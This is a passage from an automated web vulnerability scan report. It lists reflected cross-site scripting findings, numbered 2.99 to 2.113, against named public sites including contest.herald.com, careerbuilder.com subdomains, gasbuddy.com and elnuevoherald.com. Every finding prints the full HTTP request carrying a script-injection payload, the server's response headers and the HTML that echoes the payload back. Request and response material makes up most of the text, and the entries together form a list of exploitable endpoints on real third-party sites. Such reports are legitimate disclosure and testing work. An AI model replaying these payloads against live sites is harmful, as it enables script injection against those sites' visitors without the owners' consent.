User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: contest.herald.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7875
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=GNNLEONDLBLLKCBAAMLPJPOI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
</script>2f7e3e1de94=1c6ae2<script>alert(1)</script>890e9b13aa5" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.99. http://contest.herald.com/nascar/standard/ [9cec8">HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The value of the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM request parameter is copied into the HTML document as plain text between tags. The payload 290ad<script>alert(1)</script>9c0c1192ca0 was submitted in the 9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM=1290ad<script>alert(1)</script>9c0c1192ca0 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: contest.herald.com
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:21:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7910
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.14.2010.CONTEST.HERALD.COM=1290ad<script>alert(1)</script>9c0c1192ca0" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.100. http://contest.herald.com/nascar/standard/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cec8"><script>alert(1)</script>2f7e3e1de94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/?9cec8"><script>alert(1)</script>2f7e3e1de94=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCRRCBT=JLNLEONDPKNMJMBLEDNCDCCF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?9cec8"><script>alert(1)</script>2f7e3e1de94=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.101. http://contest.herald.com/nascar/standard/index.asp [9cec8 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/index.asp

Issue detail

The value of the 9cec8 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd903"><script>alert(1)</script>b536c827e11 was submitted in the 9cec8 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7837
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?9cec8bd903"><script>alert(1)</script>b536c827e11" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.102. http://contest.herald.com/nascar/standard/index.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contest.herald.com
Path:   /nascar/standard/index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a89b"><script>alert(1)</script>3188a7af4b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1 HTTP/1.1
Host: contest.herald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSQCRRCBT=OLNLEONDNPOBIPOBJHDKPOKE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7834
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">    
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Con
...[SNIP]...
<form name=Contest method=post ACTION="/nascar/standard/index.asp?8a89b"><script>alert(1)</script>3188a7af4b6=1" language=javascript ONSUBMIT="if (this.submitted) return false; else { this.submitted = true; return true; }" ID="Form1">
...[SNIP]...

2.103. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://customer-service.careerbuilder.com
Path:   /cs.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb3e"%20a%3db%20422e5f94b75 was submitted in the lr parameter. This input was echoed as 1eb3e" a=b 422e5f94b75 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cs.ic/Florida_Miami/?lr=cbcb_mh1eb3e"%20a%3db%20422e5f94b75&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190637
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=42ee23d9340f4db492a4a340c1372514-343070753-R6-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508E8A7C46AB17B4CC2649D27018AC4F86CFA6335C2EB6692671084E2DB62F4AE108378824736F440F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:52 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:53 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL6
Date: Sun, 14 Nov 2010 22:25:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh1eb3e" a=b 422e5f94b75" />
...[SNIP]...

2.104. http://customer-service.careerbuilder.com/cs.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://customer-service.careerbuilder.com
Path:   /cs.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74d08'-alert(1)-'04a0701f11a was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cs.ic/Florida_Miami/?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191278
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=eb938c0781184bcfb4d4faf5fcfe8db1-343070776-VL-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508074FA90E44D5B4F83A5472AC69B952B487300C8C40C2DDB00966E3520AE4545781BCE2F2128AA0A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:15 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:16 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL33
Date: Sun, 14 Nov 2010 22:26:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh74d08'-alert(1)-'04a0701f11a&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.105. http://df.gasbuddy.com/feed.gbmap [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://df.gasbuddy.com
Path:   /feed.gbmap

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d2a'-alert(1)-'486dca9d5d was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 603

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2a'-alert(1)-'486dca9d5d&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true;head =
...[SNIP]...

2.106. http://df.gasbuddy.com/feed.gbmap [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://df.gasbuddy.com
Path:   /feed.gbmap

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1810'-alert(1)-'b9c2d2adc10 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834 HTTP/1.1
Host: df.gasbuddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 22:25:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 604

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1b1810'-alert(1)-'b9c2d2adc10&i=2834&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true
...[SNIP]...

2.107. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eltiempo.elnuevoherald.com
Path:   /US/FL/Miami.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd5e"><script>alert(1)</script>4fe0b2c4f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:26:23 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.181
Set-Cookie: ASC=1289773583:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.htmlcbd5e"><script>alert(1)</script>4fe0b2c4f3c?map=IRSatellite&anim=0">
...[SNIP]...

2.108. http://eltiempo.elnuevoherald.com/US/FL/Miami.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://eltiempo.elnuevoherald.com
Path:   /US/FL/Miami.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b46d"><script>alert(1)</script>4d14efa3e5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1 HTTP/1.1
Host: eltiempo.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:25:56 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 3.285
Set-Cookie: ASC=1289773556:1; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 24870


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="http://eltiempo.elnuevoherald.com/US/FL/Miami.html?6b46d"><script>alert(1)</script>4d14efa3e5e=1&map=IRSatellite&anim=0">
...[SNIP]...

2.109. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://engineering.careerbuilder.com
Path:   /en.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbee"%20a%3db%20312f0d1a369 was submitted in the lr parameter. This input was echoed as adbee" a=b 312f0d1a369 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en.ic/Florida_Miami/?lr=cbcb_mhadbee"%20a%3db%20312f0d1a369&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194088
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9a591372b45048d197c7450f2738d22c-343070827-RP-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650D89AFF5D24976CE7314F6F2F9565A4DD9C01C8ABDFDB17E60471E4011A7A49609332F6EA0B9FFBAC; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:07 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 22:27:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhadbee" a=b 312f0d1a369" />
...[SNIP]...

2.110. http://engineering.careerbuilder.com/en.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://engineering.careerbuilder.com
Path:   /en.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b493'-alert(1)-'1a957c281b6 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en.ic/Florida_Miami/?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 194890
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=9dc8162df01c4990b3256468ae53f08e-343070847-RS-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65044DFD330AB56844A290AE2950B748B2AAA785234862F5A2BE9A14C55B142B8293BC3E047BD96D1BF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:27 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:27 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL28
Date: Sun, 14 Nov 2010 22:27:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh8b493'-alert(1)-'1a957c281b6&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.111. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://executive.careerbuilder.com
Path:   /ex.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3041b'-alert(1)-'6d3b4ce97bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ex.ic/Florida_Miami/?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&SiteID=cbcb_mh038 HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196142
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=e3a92f7a94bb4aefad32a22492f2f8ec-343070882-wj-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6503492847FF777B22F8576D0825F22D3B746B718754B54EA145BAD3B556B5A7EA8F7DE56AA62C5B566; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:02 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:02 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR20
Date: Sun, 14 Nov 2010 22:28:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.112. http://executive.careerbuilder.com/ex.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://executive.careerbuilder.com
Path:   /ex.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 749c6"%20a%3db%20751bb406a83 was submitted in the lr parameter. This input was echoed as 749c6" a=b 751bb406a83 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ex.ic/Florida_Miami/?lr=cbcb_mh749c6"%20a%3db%20751bb406a83&SiteID=cbcb_mh038 HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195292
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=47aedb72ac304fa681c636fd69677a9d-343070852-XA-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500EA1D41B61C64B6248A474FC3460AF4AEC050CF26BFBC579150EA207841BA8141D97498AE19DB109; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:32 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:33 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 22:27:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh749c6" a=b 751bb406a83" />
...[SNIP]...

2.113. http://gov.careerbuilder.com/gv.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://gov.careerbuilder.com
Path:   /gv.ic/Florida_Miami/

